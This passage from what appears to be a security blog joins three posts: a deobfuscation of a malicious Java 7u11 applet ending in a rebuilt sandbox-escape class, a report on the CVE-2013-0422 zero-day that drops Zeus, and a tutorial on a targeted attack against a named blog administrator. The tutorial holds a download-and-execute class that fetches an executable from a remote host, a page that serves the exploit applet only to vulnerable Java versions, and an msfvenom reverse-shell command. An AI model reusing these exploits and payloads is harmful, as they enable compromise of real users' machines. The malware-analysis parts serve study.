    MBeanInstantiator mbeaninstantiator = jmxmbeanserver.getMBeanInstantiator();
    Class class1 = Class.forName("com.sun.jmx.mbeanserver.MBeanInstantiator");
    Method method = class1.getMethod("findClass", new Class[] { String.class, ClassLoader.class });
    return (Class)method.invoke(mbeaninstantiator, new Object[] { s, obj });
}</pre>
Back to the init function: at line 76 the <b>lot</b> function is executed, and since it returns a Method object I suppose it is used to find a method.<br />
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="http://3.bp.blogspot.com/-keimpdTpQvc/USssYkmscEI/AAAAAAAAAfg/Y35_uxEhhMA/s1600/lot_function_find_method.JPG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-keimpdTpQvc/USssYkmscEI/AAAAAAAAAfg/Y35_uxEhhMA/s1600/lot_function_find_method.JPG" /></a></div>
<br />
As expected, its job is to search a class for a method whose name equals the string s passed as parameter (and, when the flag is set, that takes no arguments). Instead of <b>lot</b> let's call it <b>getMethod</b>, which sounds clearer.<br />
<pre class="brush: java">// Needs: import java.lang.reflect.Method; import com.sun.jmx.mbeanserver.Introspector;
// Introspector.elementFromComplex(class1, "declaredMethods") fetches the class's declared
// methods through trusted JMX code, so the applet can enumerate a restricted class.
private Method getMethod(Class class1, String s, boolean flag)
{
    try {
        Method[] amethod = (Method[])Introspector.elementFromComplex(class1, "declaredMethods");
        for (int i = 0; i < amethod.length; i++) {
            Method method = amethod[i];
            String s1 = method.getName();
            Class[] aclass = method.getParameterTypes();
            // The sample compares names with == (it works because reflection returns interned
            // names and s is a literal); with flag set, only a parameterless method matches.
            if ((s1 == s) && ((!flag) || (aclass.length == 0))) return method;
        }
    } catch (Exception localException) { }
    return null;
}</pre>
At line 77 the method found above is invoked. Lines 78 and 79 do the same thing as the previous lines. At line 82 a byte array (abyte0) is instantiated. <br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-ulTOiFYTH6k/USssp3eDq1I/AAAAAAAAAfs/P7kE38FTeUU/s1600/byte_array_istantiated.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-ulTOiFYTH6k/USssp3eDq1I/AAAAAAAAAfs/P7kE38FTeUU/s1600/byte_array_istantiated.JPG" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
This instruction calls two methods, one from the <b>getString4Popers</b> class and one from <b>codehex</b>. Let's examine the first one, <b>one</b>. After declaring sixteen strings (127 in total) and concatenating them, it calls another method named <b>gouerpyftn</b> from the <b>BurkinoGoso</b> class.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-ZGTlj9wVkyA/USss7qiJySI/AAAAAAAAAf0/Rz6fpoJR8OA/s1600/class_string4popers.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-ZGTlj9wVkyA/USss7qiJySI/AAAAAAAAAf0/Rz6fpoJR8OA/s1600/class_string4popers.JPG" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
All these concatenated strings go as the parameter to <b>gouerpyftn</b>. As you can see from the picture below, the value of the string str will be the value of the string str1 inside the <b>gouerpyftn</b> function. </div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-yIcOmHIjMdI/USy31sJaJFI/AAAAAAAAAmk/SlBF2K3cVxk/s1600/getkkkk_function.JPG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-yIcOmHIjMdI/USy31sJaJFI/AAAAAAAAAmk/SlBF2K3cVxk/s1600/getkkkk_function.JPG" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
Str3 and str4 are garbage because they will never be used. Instruction 13 uses reflection to call the charAt method of java.lang.String.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
What the function does, explained in pseudocode:<br />
<pre class="brush: text">// encodedString is paramString
encodedString = "F-Abr-rb((((((}g((Ar(-(((8((0r(8((}}((0F(^((0z(- ..."
// keyString is str1 (getString.getKkkk())
keyString = "b12gO6%oh3}lfs98^mYauL5{qiy)RKpk40(VXBrtW&DzCFA-JndU_eZwTNHc+7QMx*vIPSGE"
finalString = ""
for( i = 0; i < encodedString.length; i++ )
    c = encodedString.charAt(i)
    j = keyString.indexOf( c )
    if c is inside keyString
        if c is not in the first position
            take the char from keyString at position j-1
            concatenate it to finalString
        else
            take the char from keyString at position keyString.length-1
            concatenate it to finalString
    else
        take the char from encodedString at position i
        concatenate it to finalString
endfor
return finalString</pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-R5XgNFKN2A0/USx1u4CP7AI/AAAAAAAAAg8/Z89MHSRfzec/s1600/gouerpyftn_function.JPG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="418" src="http://4.bp.blogspot.com/-R5XgNFKN2A0/USx1u4CP7AI/AAAAAAAAAg8/Z89MHSRfzec/s640/gouerpyftn_function.JPG" width="640" /></a></div>
At the end of this loop str2/finalString will be like this. <br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-a90SiqCc4oc/USyIp8CJVZI/AAAAAAAAAhY/4ZJ4hXtxGTs/s1600/four_chars.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-a90SiqCc4oc/USyIp8CJVZI/AAAAAAAAAhY/4ZJ4hXtxGTs/s1600/four_chars.JPG" /></a></div>
<br />
Looking at the first eight chars you can clearly understand what kind of string this is, because CAFEBABE is the hexadecimal magic number at the start of every Java class file.<br />
<br />
But we need a byte array (abyte0); in fact, as its name suggests, the <b>decodeH</b> method of the <b>codehex</b> class converts a hexadecimal string into a byte array. <br />
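Here is that decoding routine as runnable Python, added here and not part of the applet or the post. The key string and the first sixteen characters of the encoded blob are the ones visible above; encode() is my inverse for a round-trip check, and hex_to_class() mirrors what codehex.decodeH does, with the CAFEBABE magic check a practitioner wants before writing the file out.<br />

```python
CLASS_MAGIC = b"\xca\xfe\xba\xbe"

# Alphabet recovered from the applet (str1, the return value of getKkkk()).
KEY = "b12gO6%oh3}lfs98^mYauL5{qiy)RKpk40(VXBrtW&DzCFA-JndU_eZwTNHc+7QMx*vIPSGE"

# First sixteen characters of the encoded string built by getString4Popers.one();
# the rest is elided in the post.
ENCODED_PREFIX = "F-Abr-rb((((((}g"


def decode(encoded, key=KEY):
    """gouerpyftn(): each character found in the key is replaced by the key character
    before it (position 0 wraps to the last one); other characters pass through."""
    out = []
    for c in encoded:
        j = key.find(c)
        if j < 0:
            out.append(c)
        elif j == 0:
            out.append(key[-1])
        else:
            out.append(key[j - 1])
    return "".join(out)


def encode(plain, key=KEY):
    """Inverse of decode(); not in the applet, added for the round-trip check."""
    out = []
    for c in plain:
        j = key.find(c)
        out.append(c if j < 0 else key[(j + 1) % len(key)])
    return "".join(out)


def hex_to_class(hex_string):
    """codehex.decodeH(): hex text -> bytes, plus a check that it really is a class file."""
    data = bytes.fromhex(hex_string)
    if data[:4] != CLASS_MAGIC:
        raise ValueError("decoded data does not start with CAFEBABE")
    return data


def class_version(data):
    """(major, minor) from the class-file header; major 50 (0x32) is Java 6."""
    minor = int.from_bytes(data[4:6], "big")
    major = int.from_bytes(data[6:8], "big")
    return major, minor


if __name__ == "__main__":
    hex_text = decode(ENCODED_PREFIX)
    header = hex_to_class(hex_text)
    print(hex_text, class_version(header))
    # With the full blob, write it out for the decompiler:
    # open("newfile.class", "wb").write(hex_to_class(decode(full_encoded_string)))
```

The sixteen-character prefix decodes to CAFEBABE00000032, i.e. a class file with major version 50 (compiled for Java 6), which is the header the hex view in the next screenshots confirms.<br />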
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-pEkRqjy7G_A/USyJXrp221I/AAAAAAAAAhg/GZO06TgccCk/s1600/decodeh_function.JPG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="406" src="http://4.bp.blogspot.com/-pEkRqjy7G_A/USyJXrp221I/AAAAAAAAAhg/GZO06TgccCk/s640/decodeh_function.JPG" width="640" /></a></div>
Lines 8 to 19 are again garbage added by the obfuscator, so we can remove them. To find out what code that class contains, we have to write it to a file called newfile.class and then try to open it with JD-GUI.
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-y3K7Z2r7xd0/USyKn6cF_VI/AAAAAAAAAhs/lplVnC_DMcg/s1600/jdgui_fail.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-y3K7Z2r7xd0/USyKn6cF_VI/AAAAAAAAAhs/lplVnC_DMcg/s1600/jdgui_fail.JPG" /></a></div>
But JD-GUI failed to decompile the class file. I wasn't expecting this result; anyway, let's open it with WinHex.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-kDMiDWsE5XA/USyMPXXD11I/AAAAAAAAAiY/9uxMv7t8a7A/s1600/hex_class_file.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-kDMiDWsE5XA/USyMPXXD11I/AAAAAAAAAiY/9uxMv7t8a7A/s1600/hex_class_file.JPG" /></a></div>
This confirms that it is a class file. Switching to the text-only display option, you can clearly see what this class is supposed to do. <br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-1xaAuKEvhBY/USySmt241JI/AAAAAAAAAjA/qtOdnr7uVOU/s1600/strings_class_file.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-1xaAuKEvhBY/USySmt241JI/AAAAAAAAAjA/qtOdnr7uVOU/s1600/strings_class_file.JPG" /></a></div>
<br />
Scrolling down there is an interesting string. <br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-sZNDhiXrKBk/USyTBWRgy5I/AAAAAAAAAjI/wbGdxPv9ZFc/s1600/zeilik_klassmaster.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-sZNDhiXrKBk/USyTBWRgy5I/AAAAAAAAAjI/wbGdxPv9ZFc/s1600/zeilik_klassmaster.JPG" /></a></div>
<br />
This means that this class file has been obfuscated with Zelix KlassMaster 5.4.5, which was available from <a href="http://www.zelix.com/klassmaster/changes.html">March 2011 to June 2011</a>. I don't know whether Zelix fakes its version during the obfuscation process, so I cannot be 100% sure about this. <br />
<br />
Another interesting string is<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-K9YuM804dvc/USyUgNds-II/AAAAAAAAAjo/wvttqnl39rE/s1600/string_serializable.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-K9YuM804dvc/USyUgNds-II/AAAAAAAAAjo/wvttqnl39rE/s1600/string_serializable.JPG" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Now, how do we proceed? Let's try jad, another Java decompiler.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-2Uo6GlfhP_Q/USyU0MSKN1I/AAAAAAAAAkE/B3K1Mv2FtXY/s1600/jad_decompiler.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-2Uo6GlfhP_Q/USyU0MSKN1I/AAAAAAAAAkE/B3K1Mv2FtXY/s1600/jad_decompiler.JPG" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-mqaEs-Y1NV8/USyU_Mcy61I/AAAAAAAAAkM/JI94TLCUs5s/s1600/mix_java_jvm.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="439" src="http://4.bp.blogspot.com/-mqaEs-Y1NV8/USyU_Mcy61I/AAAAAAAAAkM/JI94TLCUs5s/s640/mix_java_jvm.JPG" width="640" /></a></div>
<br />
Most of the file has been decompiled successfully, but as you can see, in the constructor it uses reflection to call a method from a class. Both names are encrypted by an XOR function called from a static field initializer during class initialization. <br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-OFSCNc4vPxg/USyVYOCYlYI/AAAAAAAAAkU/9-0GTwCQSdE/s1600/mix_java_and_jvm_instructions.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="314" src="http://1.bp.blogspot.com/-OFSCNc4vPxg/USyVYOCYlYI/AAAAAAAAAkU/9-0GTwCQSdE/s640/mix_java_and_jvm_instructions.JPG" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-v5oam0wXiAc/USyVoG4rIsI/AAAAAAAAAkc/dOg0qXSwanQ/s1600/xor_intruction.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-v5oam0wXiAc/USyVoG4rIsI/AAAAAAAAAkc/dOg0qXSwanQ/s1600/xor_intruction.JPG" /></a></div>
<br />
Not good: some methods aren't properly decompiled. It seems Zelix was used with aggressive flow obfuscation; maybe this is why jad can't fully decompile it.<br />
<br />
Searching on Google for how to deobfuscate Zelix KlassMaster files, I found this great <a href="http://www.the-playground.dk/index.php?page=zelix-klassmaster-string-encryption">post</a> by <a href="https://twitter.com/robert_c_larsen">@robert_c_larsen</a>, which explains how to decrypt these strings. The first thing we need to do is disassemble our obfuscated file with jad in order to obtain only JVM instructions. <br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-I01G0HfRlLU/USyXBlp7TsI/AAAAAAAAAkw/j_Yo7idJx30/s1600/disass_class.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-I01G0HfRlLU/USyXBlp7TsI/AAAAAAAAAkw/j_Yo7idJx30/s1600/disass_class.JPG" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-bllKQrtHvSU/USyW4-Ea2DI/AAAAAAAAAko/2uiZ3lzc8sY/s1600/java_disass.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="251" src="http://3.bp.blogspot.com/-bllKQrtHvSU/USyW4-Ea2DI/AAAAAAAAAko/2uiZ3lzc8sY/s640/java_disass.JPG" width="640" /></a></div>
<br />
Now all we have to do is interpret these instructions. I will cover the most important parts; if you want a full overview, I suggest you read Robert's post. The picture below shows a string being pushed onto the stack and then passed to the decrypting subroutine. <br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-iLq-oVsUp6o/USyXVWOTM0I/AAAAAAAAAlM/k-UMb5HxWxA/s1600/storing_encrypted_strings.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-iLq-oVsUp6o/USyXVWOTM0I/AAAAAAAAAlM/k-UMb5HxWxA/s1600/storing_encrypted_strings.JPG" /></a></div>
<br />
The decrypting subroutine starts at instruction 132 by splitting the given string into a char array. <br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-XCN521Cnywo/USyXcgEExYI/AAAAAAAAAlU/1ejdGTG2Qpg/s1600/dcrypt_subroutine_starts.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-XCN521Cnywo/USyXcgEExYI/AAAAAAAAAlU/1ejdGTG2Qpg/s1600/dcrypt_subroutine_starts.JPG" /></a></div>
<br />
Next, an array of five elements is stored, and from instruction 184 to 204 five integers (which are the keys) are pushed onto the stack and an XOR operation is performed. <br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-g3i0XcSb0bU/USyYGuuzTKI/AAAAAAAAAlc/0HTEx1VgmKw/s1600/xor.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-g3i0XcSb0bU/USyYGuuzTKI/AAAAAAAAAlc/0HTEx1VgmKw/s1600/xor.JPG" /></a></div>
<br />
Knowing this, we can rebuild the code.<br />
<br />
For some strange reason the syntax highlighter doesn't allow me to paste this code here; I will investigate.<br />
<br />
<a href="http://pastebin.com/fqAJpBdC">Link to pastebin</a><br />
<br />
Run it and voilà, all strings are decrypted. <br />
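The decryption routine read from the disassembly above (string split into chars, five integer keys, XOR) is small enough to reproduce as an analyst's helper. The Python below is an added example, not the post's rebuilt code; it assumes the key for character i is keys[i % 5], uses constructed keys and constants (not the ones from the analysed sample), and goes one step further by recovering the five keys from a known "java." prefix, which is what you do when the key constants are hard to read out of the bytecode.

```python
from typing import List

# Constructed sample only: five XOR keys of the kind the applet pushes at
# instructions 184-204. They are NOT the keys of the analysed sample; the real
# values have to be read from the disassembly.
KEYS = [0x3A, 0x5E, 0x17, 0x72, 0x49]

# The strings the post shows being decrypted (see the rebuilt Payload class).
PLAINTEXTS = [
    "java.security.AccessController",
    "doPrivileged",
    "java.security.PrivilegedExceptionAction",
    "setSecurityManager",
]


def zkm_xor(text: str, keys: List[int]) -> str:
    """Position-keyed XOR. Assumption: char i is XORed with keys[i % len(keys)],
    which is how the five-key selection in the disassembly is read here.
    XOR is its own inverse, so the same function encrypts and decrypts."""
    return "".join(chr(ord(c) ^ keys[i % len(keys)]) for i, c in enumerate(text))


# Constructed "encrypted constants" as they would sit in the obfuscated class.
ENCRYPTED = [zkm_xor(s, KEYS) for s in PLAINTEXTS]


def recover_keys(ciphertext: str, known_plaintext: str, nkeys: int = 5) -> List[int]:
    """Known-plaintext key recovery. The key schedule repeats every nkeys
    characters, so nkeys characters of one string whose plaintext is known
    (here the 'java.' prefix of a class name) yield the whole key array."""
    if min(len(ciphertext), len(known_plaintext)) < nkeys:
        raise ValueError(f"need at least {nkeys} characters of known plaintext")
    return [ord(ciphertext[i]) ^ ord(known_plaintext[i]) for i in range(nkeys)]


def decrypt_all(encrypted: List[str], keys: List[int]) -> List[str]:
    """Decrypt every encrypted constant with one key array."""
    return [zkm_xor(s, keys) for s in encrypted]


def demo() -> List[str]:
    """Recover the keys from the first constant's 'java.' prefix, then decrypt all."""
    keys = recover_keys(ENCRYPTED[0], "java.")
    return decrypt_all(ENCRYPTED, keys)


if __name__ == "__main__":
    for s in demo():
        print(s)
```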
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-Q6Ahd7FVId8/USyYPWh4-4I/AAAAAAAAAlk/9iXMmdv6Sz8/s1600/deob_strings.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-Q6Ahd7FVId8/USyYPWh4-4I/AAAAAAAAAlk/9iXMmdv6Sz8/s1600/deob_strings.JPG" /></a></div>
I've renamed javaRun to Payload. <br />
<pre class="brush: java">public class Payload implements PrivilegedExceptionAction
{
    public Payload()
    {
        try
        {
            Class.forName("java.security.AccessController").getMethod("doPrivileged", new Class[] { Class.forName("java.security.PrivilegedExceptionAction")
            }).invoke(Class.forName("java.security.AccessController"), new Object[] {
                this
            });
        }
        catch(Exception exception) { }
    }
    public Object run() throws Exception
    {
        System.setSecurityManager(null);
        return null;
    }
    public static void outSandbox() throws Exception
    {
        Runtime.getRuntime().exec("calc.exe");
    }
}</pre>
Instead of running the calculator from the run function, I chose to create another function called outSandbox to make it clearer.<br />
<br />
Back to init(): the instructions at lines 84, 85 and 86 call the same methods we have already seen. Instruction 89 returns a string, apparently the path of the jar. Instructions 90 and 91 call the constructor of the Payload class and instantiate it. <br />
<br />
I've modified the code a bit from the original version.<br />
<br />
<a href="http://pastebin.com/QWU1rqjf">Java 7u11 Exploit Source Code</a><br />
<br />
Now we have finished, so let's test it out. <br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-qaNBcJWX80s/USyafkp3XCI/AAAAAAAAAmE/NMIEQnIQY9U/s1600/poc_works.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="344" src="http://2.bp.blogspot.com/-qaNBcJWX80s/USyafkp3XCI/AAAAAAAAAmE/NMIEQnIQY9U/s640/poc_works.jpg" width="640" /></a></div>
It works! This PoC can be improved, but I leave it as it is. Kafeine told me that, instead of deobfuscating this applet, I could have used some that were not obfuscated. The only thing I can say is: bad luck for me.<br />
<br />
Hope you enjoyed. <br />
<br />
If you want to read an analysis of this vulnerability, <a href="https://community.rapid7.com/community/metasploit/blog/2013/02/25/java-abused-in-the-wild-one-more-time">here</a> is a post by Juan Vazquez from Rapid7.<br />
<br />
Reference: <br />
<ul>
<li><a href="http://quequero.org/2013/01/malicious-java-applet-deobfuscation/">http://quequero.org/2013/01/malicious-java-applet-deobfuscation/</a></li>
<li><a href="http://www.the-playground.dk/index.php?page=zelix-klassmaster-string-encryption">http://www.the-playground.dk/index.php?page=zelix-klassmaster-string-encryption</a> </li>
<li><a href="http://en.wikipedia.org/wiki/Java_bytecode_instruction_listings">http://en.wikipedia.org/wiki/Java_bytecode_instruction_listings</a></li>
</ul>
<br />
<b>About the new java 0 day vulnerability (CVE-2013-0422)</b> (Security Obscurity, 2013-01-10)<br />
<br />
A couple of hours ago <a href="https://twitter.com/kafeine">@Kafeine</a> discovered a new Java 0-day exploit in the wild.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-SYTRtkb-SRs/UO7ktVNMQ-I/AAAAAAAAAc0/G_a3aDmcI7c/s1600/kafeine_tweet.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-SYTRtkb-SRs/UO7ktVNMQ-I/AAAAAAAAAc0/G_a3aDmcI7c/s1600/kafeine_tweet.jpg" /></a></div>
<br />
This exploit is served by most exploit kits, such as Blackhole, Cool Exploit Kit and Nuclear Pack. When the malicious applet is executed it downloads and executes a copy of Zeus.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-5jtaSv7Znhc/UO7lvrWdzPI/AAAAAAAAAdA/l1OZHNg8lmI/s1600/ff_process.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-5jtaSv7Znhc/UO7lvrWdzPI/AAAAAAAAAdA/l1OZHNg8lmI/s1600/ff_process.jpg" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-EelwGlRsAaA/UO7m1Ah0WgI/AAAAAAAAAdc/OnMNaW9fwos/s1600/zeus_details.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-EelwGlRsAaA/UO7m1Ah0WgI/AAAAAAAAAdc/OnMNaW9fwos/s1600/zeus_details.jpg" /></a></div>
<br />
A curious thing is that Zbot comes with a self-signed digital certificate.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-6W-z0qeCZls/UO7i5ObHd_I/AAAAAAAAAcY/kz2J1Pd8h0g/s1600/zeus_certificate.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-6W-z0qeCZls/UO7i5ObHd_I/AAAAAAAAAcY/kz2J1Pd8h0g/s1600/zeus_certificate.jpg" /></a></div>
<br />
But the detection rate is quite good at 12/46 (<a href="https://www.virustotal.com/file/54c196849f3138fa76eea10db3ae6cc14e27b9234bf4704e98ebf376b9a67ee2/analysis/1357832719/">link</a>).<br />
<br />
The jar file was dropped by Blackhole, so it is heavily obfuscated by some commercial obfuscator, and it is detected by 5/46 (<a href="https://www.virustotal.com/file/dcb87472aebdd993bd0c2179c9b5ce930fb1836121bd7aaec5f0b167602fff2b/analysis/1357831496/">link</a>).<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-1lg2xn8I2e8/UO7pOH7zOXI/AAAAAAAAAeI/wdLJQYHhPOA/s1600/java_exploit_screen.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="462" src="http://4.bp.blogspot.com/-1lg2xn8I2e8/UO7pOH7zOXI/AAAAAAAAAeI/wdLJQYHhPOA/s640/java_exploit_screen.jpg" width="640" /></a></div>
<br />
You can find both files <a href="http://www.kernelmode.info/forum/viewtopic.php?f=16&t=1819&start=20#p17675">here</a> (the password is: malware).<br />
<br />
If you want to read more take a look at kafeine's <a href="http://malware.dontneedcoffee.com/2013/01/0-day-17u10-spotted-in-while-disable.html">blog post</a>.<br />
<br />
-- Update<br />
<br />
Working PoC <a href="http://pastebin.com/cas8WEBZ">here</a>.<br />
<br />
A quick video showing this PoC against Avira Free antivirus.<br />
<br />
<iframe allowfullscreen="allowfullscreen" frameborder="0" height="360" src="http://www.youtube.com/embed/OefY9gB-ITM" width="640"></iframe><br />
<br />
<b>Attacking Windows 8 with Java Exploit and Metasploit</b> (Security Obscurity, 2012-12-07)<br />
<br />
In the last post I was talking about how to obfuscate a Java exploit (CVE-2012-4681, link <a href="http://security-obscurity.blogspot.com/2012/11/java-exploit-code-obfuscation-and.html">here</a>); now I want to show you how an attacker can use this obfuscated exploit for a <b>targeted</b> attack.<br />
<br />
This is intended to be the second part of the <a href="https://www.youtube.com/watch?v=JrwlislvE1U">Wordpress Cookie Grabber</a> video, because I will show what you can do once you have compromised a website, Frank's blog in this case. The only victim will be the administrator.<br />
<br />
The exploit code in the previous article just escapes from the Java sandbox and launches the Windows calculator. What we want to do is launch something different, like a meterpreter reverse shell that connects back to the attacker. Thus we have to add a download &amp; execute class/method to the previous code.<br />
<br />
I opted for a new class, but you can certainly add a method to the same class. This new class, called NewClass (I'm lacking imagination), will download a meterpreter executable from a remote host, save it as fsc73B8.tmp.exe in the temp folder and then execute it.<br />
<br />
<pre class="brush: java">class NewClass
{
    // Directory
    String t = "java", m = "io", p = "tmpdir", dot = ".";
    // Remote url
    String r1 = "http:", e = "//192", m1 = "168", o = "2.3/fo", t1 = "lder/java", e1 = "exe";
    public NewClass()
    {
        String l = System.getProperty( t+dot+m+dot+p ); // get temp folder path
        String r = r1+e+dot+m1+dot+o+t1+dot+e1;
        d( r, l);
    }
    private void d(String rPath, String lPath)
    {
        // File name
        lPath += "\\fsc73B8.tmp.";
        try
        {
            URL url = new URL(rPath);
            ReadableByteChannel rbc = Channels.newChannel(url.openStream());
            FileOutputStream fos = new FileOutputStream(lPath+"exe");
            fos.getChannel().transferFrom(rbc, 0, 1 << 24);
            fos.close();
            // execute
            Runtime.getRuntime().exec(lPath+"exe");
        } catch( Exception e ){}
    }
}
</pre>
<br />
These two classes will be packed into one jar named <b>java.jar</b>; will it be detected by antivirus?<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-LfE0WKokF60/ULjgWfi_R1I/AAAAAAAAAZw/HBe1tZct7Nk/s1600/jar_detection.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-LfE0WKokF60/ULjgWfi_R1I/AAAAAAAAAZw/HBe1tZct7Nk/s1600/jar_detection.jpg" /></a></div>
<br />
Link <a href="https://www.virustotal.com/file/0bfb911acc46a593b9fb82574127af598eba0d25277f2cdbe266f44020fffcf6/analysis/1352409560/">here</a>.<br />
<br />
OK, great, it's not detected. In our scenario we have to infect only the administrator (Frank), and only if he has a vulnerable version of Java. To check this we use <a href="http://www.pinlady.net/PluginDetect/">PluginDetect</a>, a powerful JavaScript library (also used by Blackhole up to version 1.2.5) able to detect all plugins installed in the browser.<br />
<br />
The page that checks this will look like this.<br />
<br />
<pre class="brush: xml"><script src="PluginDetect.js" type="text/javascript"></script>
<script type="text/javascript">
// detect java plugin
if( PluginDetect.isMinVersion("Java") >= 0 )
{
    // check version (the " " call sets the version delimiter)
    PluginDetect.getVersion(" ");
    var version = PluginDetect.getVersion("Java");
    // Affected versions
    // 170, 1701, 1702, 1703, 1704, 1705, 1706
    version = version.replace(/\s/g, "");
    if( version.length == 3 )
        version = "1700";
    // Convert to int so i can compare
    var intVersion = parseInt(version);
    // if vulnerable
    if( intVersion >= 1700 && intVersion <= 1706 )
    {
        document.write("&lt;applet code=\"Java.class\" archive=\"java.jar\"&gt;&lt;/applet&gt;");
    }
}
</script>
</pre>
<br />
Now it's time to create a meterpreter TCP reverse shell that connects back to us.<br />
<br />
<pre class="brush: plain">sudo msfvenom -p windows/meterpreter/reverse_tcp -f exe LHOST=192.168.2.10 LPORT=15000 > meterpreter.exe
</pre>
<br />
